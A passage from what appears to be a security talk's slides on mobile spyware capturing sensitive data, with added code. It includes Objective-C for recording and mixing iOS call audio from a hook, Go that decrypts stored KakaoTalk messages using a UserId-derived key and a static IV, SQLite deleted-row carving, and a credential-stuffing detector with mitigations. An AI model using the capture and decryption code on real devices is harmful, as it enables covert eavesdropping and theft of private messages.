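	for i, v := range fields {
		binary.LittleEndian.PutUint32(out[4*i:], v)
	}
	copy(out[headerSize:], r.PCM)
	return out
}

// ParseDump walks a dump and returns every complete record. On a truncated
// header, an unpatched size field or a size that runs past the end it stops
// and returns the records read so far together with an error.
func ParseDump(data []byte) ([]Record, error) {
	var recs []Record
	for off := 0; off < len(data); {
		if len(data)-off < headerSize {
			return recs, fmt.Errorf("truncated header at offset %d", off)
		}
		var f [6]uint32
		for i := range f {
			f[i] = binary.LittleEndian.Uint32(data[off+4*i:])
		}
		if f[5] == placeholder {
			return recs, fmt.Errorf("unpatched header at offset %d", off)
		}
		start := off + headerSize
		if uint64(f[5]) > uint64(len(data)-start) {
			return recs, fmt.Errorf("record at offset %d claims %d bytes past end of file", off, f[5])
		}
		end := start + int(f[5])
		recs = append(recs, Record{
			Cblk: f[0], Ts0: f[1], Ts1: f[2], StreamType: f[3], SampleRate: f[4],
			PCM: append([]byte(nil), data[start:end]...),
		})
		off = end
	}
	return recs, nil
}

// PCMByTrack joins the buffers of each track (keyed by cblk) in file order,
// which is the order the hook saw them, giving one raw PCM stream per track.
func PCMByTrack(recs []Record) map[uint32][]byte {
	out := map[uint32][]byte{}
	for _, r := range recs {
		out[r.Cblk] = append(out[r.Cblk], r.PCM...)
	}
	return out
}

// SampleDump is constructed test input: two buffers from one track, one from
// another, then a header the hook never got to patch.
func SampleDump() []byte {
	var d []byte
	d = append(d, EncodeRecord(Record{Cblk: 0x1000, Ts0: 1, Ts1: 2, StreamType: 3, SampleRate: 8000, PCM: []byte{1, 2, 3, 4}})...)
	d = append(d, EncodeRecord(Record{Cblk: 0x2000, SampleRate: 44100, PCM: []byte{9, 9}})...)
	d = append(d, EncodeRecord(Record{Cblk: 0x1000, Ts0: 1, Ts1: 3, StreamType: 3, SampleRate: 8000, PCM: []byte{5, 6}})...)
	unpatched := make([]byte, headerSize)
	for i := 0; i < 6; i++ {
		binary.LittleEndian.PutUint32(unpatched[4*i:], placeholder)
	}
	return append(d, unpatched...)
}

func main() {
	recs, err := ParseDump(SampleDump())
	fmt.Printf("%d complete records, stopped with: %v\n", len(recs), err)
	for cblk, pcm := range PCMByTrack(recs) {
		fmt.Printf("track %#x: %d bytes of PCM\n", cblk, len(pcm))
	}
}
```

The per-track streams are still raw: sample format and channel count are not in the header, so they have to be taken from the streamType and sampleRate words together with knowledge of the device's audio configuration before the data can be played back.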
  • 29. Capture Sensitive Data: iOS Call & MIC
  - Audio unit hooking by Substrate
  • 30. Capture Sensitive Data: iOS Call & Voice
  - Audio unit hooking by Substrate
  Dumping the audio buffer: the microphone and speaker captures are read back with ExtAudioFile and interleaved into one stereo LPCM buffer (left channel = mic, right = speaker), which ExtAudioFileWrite converts to AAC on the way out. The setup of micBuffer was cut off at the top of the slide; it mirrors speakerBuffer.

```objc
AudioBufferList micBuffer;
micBuffer.mNumberBuffers = 1;
micBuffer.mBuffers[0].mNumberChannels = 1;
micBuffer.mBuffers[0].mDataByteSize = sampleSize * bufferSizeInSamples;
micBuffer.mBuffers[0].mData = malloc(micBuffer.mBuffers[0].mDataByteSize);

AudioBufferList speakerBuffer;
speakerBuffer.mNumberBuffers = 1;
speakerBuffer.mBuffers[0].mNumberChannels = 1;
speakerBuffer.mBuffers[0].mDataByteSize = sampleSize * bufferSizeInSamples;
speakerBuffer.mBuffers[0].mData = malloc(speakerBuffer.mBuffers[0].mDataByteSize);

AudioBufferList mixBuffer;   // two interleaved channels, so twice the bytes
mixBuffer.mNumberBuffers = 1;
mixBuffer.mBuffers[0].mNumberChannels = 2;
mixBuffer.mBuffers[0].mDataByteSize = sampleSize * bufferSizeInSamples * 2;
mixBuffer.mBuffers[0].mData = malloc(mixBuffer.mBuffers[0].mDataByteSize);

// Converting
while (true) {
    // Reading data from input files; each read reports how many frames it
    // actually got, so stop at the shorter of the two streams
    UInt32 micFrames = bufferSizeInSamples;
    UInt32 speakerFrames = bufferSizeInSamples;
    ExtAudioFileRead(micFile, &micFrames, &micBuffer);
    ExtAudioFileRead(speakerFile, &speakerFrames, &speakerBuffer);
    UInt32 framesToRead = micFrames < speakerFrames ? micFrames : speakerFrames;
    if (framesToRead == 0) {
        break;
    }
    // Building interleaved stereo buffer - left channel is mic, right - speaker
    for (int i = 0; i < framesToRead; i++) {
        memcpy((char*)mixBuffer.mBuffers[0].mData + i * sampleSize * 2,
               (char*)micBuffer.mBuffers[0].mData + i * sampleSize, sampleSize);
        memcpy((char*)mixBuffer.mBuffers[0].mData + i * sampleSize * 2 + sampleSize,
               (char*)speakerBuffer.mBuffers[0].mData + i * sampleSize, sampleSize);
    }
    // Writing to output file - LPCM will be converted to AAC
    ExtAudioFileWrite(mixFile, framesToRead, &mixBuffer);
}
// Closing files
ExtAudioFileDispose(micFile);
ExtAudioFileDispose(speakerFile);
ExtAudioFileDispose(mixFile);
free(micBuffer.mBuffers[0].mData);
free(speakerBuffer.mBuffers[0].mData);
free(mixBuffer.mBuffers[0].mData);
```
  • 31. Capture Sensitive Data: Capture Messages & Other Data
  - Messages are stored as files (.db, .sqlite, .xml, etc.)
  - Plain text
  - Encrypted messages: need decryption (usually the key is stored in local storage next to the data)
  • 32. Capture Sensitive Data: Encrypted Message - the case of KakaoTalk
  - AES-256-CBC encryption
  - The encryption key is generated from the UserId
  - The IV is static (1608096f02172b0821210a1003030706)
  Because the key is derived from data held on the device and the IV never changes, anyone who copies the database file and the UserId can decrypt every stored message, and equal message prefixes are visible even without the key.
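What that combination means in practice, as an added example that is neither KakaoTalk's code nor the author's: the IV is the one quoted above, the key derivation is assumed to be SHA-256 of the UserId purely for illustration (the slide does not say how the key is generated), and the corrected form with a fresh IV per message is shown beside the weak one.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"io"
)

// StaticIV is the fixed IV quoted on the slide, as hex.
const StaticIV = "1608096f02172b0821210a1003030706"

var staticIV, _ = hex.DecodeString(StaticIV)

// deriveKey stands in for the app's key derivation. The slide only says the
// key is generated from the UserId; SHA-256 of the id is an ASSUMPTION made
// for this example, not the real scheme.
func deriveKey(userID string) []byte {
	sum := sha256.Sum256([]byte(userID))
	return sum[:]
}

func pkcs7Pad(b []byte, size int) []byte {
	n := size - len(b)%size
	return append(append([]byte(nil), b...), bytes.Repeat([]byte{byte(n)}, n)...)
}

func pkcs7Unpad(b []byte, size int) ([]byte, error) {
	if len(b) == 0 || len(b)%size != 0 {
		return nil, errors.New("bad length")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > size {
		return nil, errors.New("bad padding")
	}
	for _, c := range b[len(b)-n:] {
		if int(c) != n {
			return nil, errors.New("bad padding")
		}
	}
	return b[:len(b)-n], nil
}

// EncryptCBC is what the client does. With a fixed key and IV it is
// deterministic: equal plaintext prefixes give equal ciphertext blocks.
func EncryptCBC(key, iv, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	padded := pkcs7Pad(plaintext, block.BlockSize())
	out := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(out, padded)
	return out, nil
}

func DecryptCBC(key, iv, ciphertext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	if len(ciphertext) == 0 || len(ciphertext)%block.BlockSize() != 0 {
		return nil, errors.New("ciphertext not block aligned")
	}
	out := make([]byte, len(ciphertext))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(out, ciphertext)
	return pkcs7Unpad(out, block.BlockSize())
}

// DecryptStoredMessage is all a stealer needs once it holds the database
// file and the UserId: derive the key, apply the known IV.
func DecryptStoredMessage(userID string, ciphertext []byte) ([]byte, error) {
	return DecryptCBC(deriveKey(userID), staticIV, ciphertext)
}

// SharesFirstBlock shows the leak that needs no key at all: two ciphertexts
// with the same first block came from the same first 16 plaintext bytes.
func SharesFirstBlock(a, b []byte) bool {
	return len(a) >= aes.BlockSize && len(b) >= aes.BlockSize &&
		bytes.Equal(a[:aes.BlockSize], b[:aes.BlockSize])
}

// EncryptFreshIV is the corrected form: a random IV per message, stored in
// front of the ciphertext (decrypt with DecryptCBC(key, blob[:16], blob[16:])).
// It fixes only the IV; the key is still derivable from local data and the
// scheme still has no integrity check.
func EncryptFreshIV(key, plaintext []byte) ([]byte, error) {
	iv := make([]byte, aes.BlockSize)
	if _, err := io.ReadFull(rand.Reader, iv); err != nil {
		return nil, err
	}
	ct, err := EncryptCBC(key, iv, plaintext)
	if err != nil {
		return nil, err
	}
	return append(iv, ct...), nil
}

func main() {
	key := deriveKey("user-1234")
	a, _ := EncryptCBC(key, staticIV, []byte("Meeting at 10:00 tomorrow, room A"))
	b, _ := EncryptCBC(key, staticIV, []byte("Meeting at 10:00 tonight, room B"))
	fmt.Println("same first block under the static IV:", SharesFirstBlock(a, b))
	pt, _ := DecryptStoredMessage("user-1234", a)
	fmt.Printf("recovered from the database: %s\n", pt)
}
```

A fresh IV stops the prefix leak but does nothing about the core problem the slide points at: a key that can be regenerated from data sitting beside the ciphertext protects the messages only from someone who has the file but not the device, which is not the attacker described here.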

  • 33. Capture Sensitive Data: Deleted Message Recovery
  - Before deleting
  - After deleting
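One reason a deleted message can still be read out of such a file: SQLite moves freed pages to a freelist and does not wipe them until they are reused or the file is vacuumed. The Go program below is an added example, not anything from the slides: it walks the freelist of a database image and carves printable strings from the freed pages. The database image is constructed inline (header page, one freelist trunk page, one freed leaf page still holding a row's bytes).

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
	"unicode"
	"unicode/utf8"
)

const sqliteMagic = "SQLite format 3\x00"

// pageSize reads the page size from the 100-byte database header (offset 16,
// big-endian; the value 1 means 65536).
func pageSize(db []byte) (int, error) {
	if len(db) < 100 || string(db[:16]) != sqliteMagic {
		return 0, errors.New("not a SQLite 3 database")
	}
	ps := int(binary.BigEndian.Uint16(db[16:18]))
	if ps == 1 {
		ps = 65536
	}
	return ps, nil
}

// freelistPages follows the freelist from header offset 32 (first trunk page).
// A trunk page holds the next trunk page number, a leaf count and the leaf
// page numbers; both trunk and leaf pages are returned since neither is wiped.
func freelistPages(db []byte, ps int) ([]uint32, error) {
	var pages []uint32
	seen := map[uint32]bool{}
	for trunk := binary.BigEndian.Uint32(db[32:36]); trunk != 0; {
		if seen[trunk] {
			return nil, errors.New("freelist loop")
		}
		seen[trunk] = true
		off := int(trunk-1) * ps
		if off+ps > len(db) {
			return nil, fmt.Errorf("trunk page %d outside file", trunk)
		}
		pages = append(pages, trunk)
		next := binary.BigEndian.Uint32(db[off:])
		n := int(binary.BigEndian.Uint32(db[off+4:]))
		if 8+4*n > ps {
			return nil, fmt.Errorf("trunk page %d claims %d leaves", trunk, n)
		}
		for i := 0; i < n; i++ {
			pages = append(pages, binary.BigEndian.Uint32(db[off+8+4*i:]))
		}
		trunk = next
	}
	return pages, nil
}

// printableRuns returns the runs of at least minLen printable UTF-8 characters in b.
func printableRuns(b []byte, minLen int) []string {
	var runs []string
	var cur []rune
	flush := func() {
		if len(cur) >= minLen {
			runs = append(runs, string(cur))
		}
		cur = cur[:0]
	}
	for i := 0; i < len(b); {
		r, size := utf8.DecodeRune(b[i:])
		if r == utf8.RuneError || !unicode.IsPrint(r) {
			flush()
		} else {
			cur = append(cur, r)
		}
		i += size
	}
	flush()
	return runs
}

// CarveFreelistStrings returns printable strings found on freelist pages,
// i.e. remnants of deleted rows. It does not look at freeblocks inside live
// pages, which also keep deleted cells and need a cell walker.
func CarveFreelistStrings(db []byte, minLen int) ([]string, error) {
	ps, err := pageSize(db)
	if err != nil {
		return nil, err
	}
	pages, err := freelistPages(db, ps)
	if err != nil {
		return nil, err
	}
	var found []string
	for _, p := range pages {
		off := int(p-1) * ps
		if p == 0 || off+ps > len(db) {
			return found, fmt.Errorf("freelist page %d outside file", p)
		}
		found = append(found, printableRuns(db[off:off+ps], minLen)...)
	}
	return found, nil
}

// SampleDB builds a constructed 3-page image: the header page, a freelist
// trunk (page 2) listing one leaf (page 3), and on that leaf the bytes of a
// row that was deleted but never overwritten.
func SampleDB() []byte {
	const ps = 512
	db := make([]byte, 3*ps)
	copy(db, sqliteMagic)
	binary.BigEndian.PutUint16(db[16:], ps)
	binary.BigEndian.PutUint32(db[28:], 3)    // page count
	binary.BigEndian.PutUint32(db[32:], 2)    // first freelist trunk page
	binary.BigEndian.PutUint32(db[36:], 2)    // total freelist pages
	binary.BigEndian.PutUint32(db[ps+4:], 1)  // trunk: no next trunk, one leaf
	binary.BigEndian.PutUint32(db[ps+8:], 3)  // the leaf is page 3
	copy(db[2*ps+40:], "\x1b\x03\x19meet me at the usual place")
	return db
}
```

On a real messenger database the same walk turns up whole records, and a page that was freed while secure_delete was off keeps its contents across many later writes; the mitigation is PRAGMA secure_delete (or an overwrite on delete) plus periodic VACUUM, which is exactly what the stealer hopes the app does not do.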
  • 34. Capture Sensitive Data: Capture Messages via Window
  - Accessibility
  - Special permission for Accessibility
  • 35. Capture Sensitive Data: Capture Messages via Window (Accessibility; special permission for Accessibility)
  • 36. Capture Sensitive Data: Messages and other data (summary)
  - Messages stored as files (.db, .sqlite, .xml, etc.)
    - plain text
    - encrypted messages: need decryption (usually the encryption key is stored in local storage)
  - Special permission: Accessibility
  - SMS, BLIND
  • 39. Capture Sensitive Data: Authentication Brute-force Attack
  - Using credentials collected from other hacked websites (password reuse lets a leaked list be replayed against the target service)
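On the defender's side this replay looks different from a brute force on one account: many distinct usernames, each tried once or twice from the same source. The Go program below is an added example, not from the slides, and its log line format is an assumption; it runs that check over a constructed login log and also lists the accounts that did log in successfully from a flagged source, since those are the ones a second authentication channel should have challenged.

```go
package main

import (
	"fmt"
	"sort"
	"strings"
	"time"
)

// LoginEvent is one parsed line of an authentication log.
type LoginEvent struct {
	At   time.Time
	IP   string
	User string
	OK   bool
}

// ParseLine reads the constructed format "<RFC3339 time> <ip> <user> <OK|FAIL>".
// The format is an assumption for this example; real logs need their own parser.
func ParseLine(line string) (LoginEvent, error) {
	f := strings.Fields(line)
	if len(f) != 4 || (f[3] != "OK" && f[3] != "FAIL") {
		return LoginEvent{}, fmt.Errorf("malformed line: %q", line)
	}
	t, err := time.Parse(time.RFC3339, f[0])
	if err != nil {
		return LoginEvent{}, err
	}
	return LoginEvent{At: t, IP: f[1], User: f[2], OK: f[3] == "OK"}, nil
}

// DetectStuffing returns, per source IP, the largest number of distinct
// accounts that failed to log in from that IP inside any span of `window`,
// keeping only sources that reach minUsers. One account failing many times
// (classic brute force) does not trigger it; many accounts tried once each
// (a leaked list being replayed) does.
func DetectStuffing(events []LoginEvent, window time.Duration, minUsers int) map[string]int {
	byIP := map[string][]LoginEvent{}
	for _, e := range events {
		if !e.OK {
			byIP[e.IP] = append(byIP[e.IP], e)
		}
	}
	flagged := map[string]int{}
	for ip, fails := range byIP {
		sort.Slice(fails, func(i, j int) bool { return fails[i].At.Before(fails[j].At) })
		best := 0
		for i := range fails { // window ending at fails[i]
			users := map[string]bool{}
			for j := i; j >= 0 && fails[i].At.Sub(fails[j].At) <= window; j-- {
				users[fails[j].User] = true
			}
			if len(users) > best {
				best = len(users)
			}
		}
		if best >= minUsers {
			flagged[ip] = best
		}
	}
	return flagged
}

// CompromisedAccounts lists the accounts that logged in successfully from a
// flagged source: the leaked credentials that still worked here.
func CompromisedAccounts(events []LoginEvent, flagged map[string]int) []string {
	seen := map[string]bool{}
	for _, e := range events {
		if e.OK && flagged[e.IP] > 0 {
			seen[e.User] = true
		}
	}
	var users []string
	for u := range seen {
		users = append(users, u)
	}
	sort.Strings(users)
	return users
}

// SampleLog is constructed data: one source cycling through leaked accounts,
// one source hammering a single account, and an unrelated legitimate login.
var SampleLog = []string{
	"2015-06-01T10:00:01Z 203.0.113.5 alice FAIL",
	"2015-06-01T10:00:03Z 203.0.113.5 bob FAIL",
	"2015-06-01T10:00:05Z 203.0.113.5 carol FAIL",
	"2015-06-01T10:00:07Z 203.0.113.5 dave FAIL",
	"2015-06-01T10:00:09Z 203.0.113.5 erin OK",
	"2015-06-01T10:00:11Z 203.0.113.5 frank FAIL",
	"2015-06-01T10:00:12Z 198.51.100.7 alice FAIL",
	"2015-06-01T10:00:14Z 198.51.100.7 alice FAIL",
	"2015-06-01T10:00:16Z 198.51.100.7 alice FAIL",
	"2015-06-01T10:00:20Z 192.0.2.9 grace OK",
}

// Analyse parses the lines and runs both checks.
func Analyse(lines []string, window time.Duration, minUsers int) (map[string]int, []string, error) {
	var events []LoginEvent
	for _, l := range lines {
		e, err := ParseLine(l)
		if err != nil {
			return nil, nil, err
		}
		events = append(events, e)
	}
	flagged := DetectStuffing(events, window, minUsers)
	return flagged, CompromisedAccounts(events, flagged), nil
}

func main() {
	flagged, compromised, err := Analyse(SampleLog, 5*time.Minute, 5)
	fmt.Println("flagged sources:", flagged, "accounts to challenge:", compromised, err)
}
```

The threshold and window are tuning knobs: too low and shared NAT addresses are flagged, too high and a slow replay spread over hours slips through, which is why the source-level check works best next to a per-account rate limit and a second factor on any login from an unfamiliar device.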
  • 40. Conclusion: we still confront security holes that we can hardly control, or cannot control at all
  - Injection on the network level: file reputation services; VPN
  - Encryption: Trusted Platform Module - encrypt/decrypt sensitive data inside the secure world, so the key never sits in ordinary local storage
  - Authentication brute-force attack: 2-channel authentication
  • 41. Q / A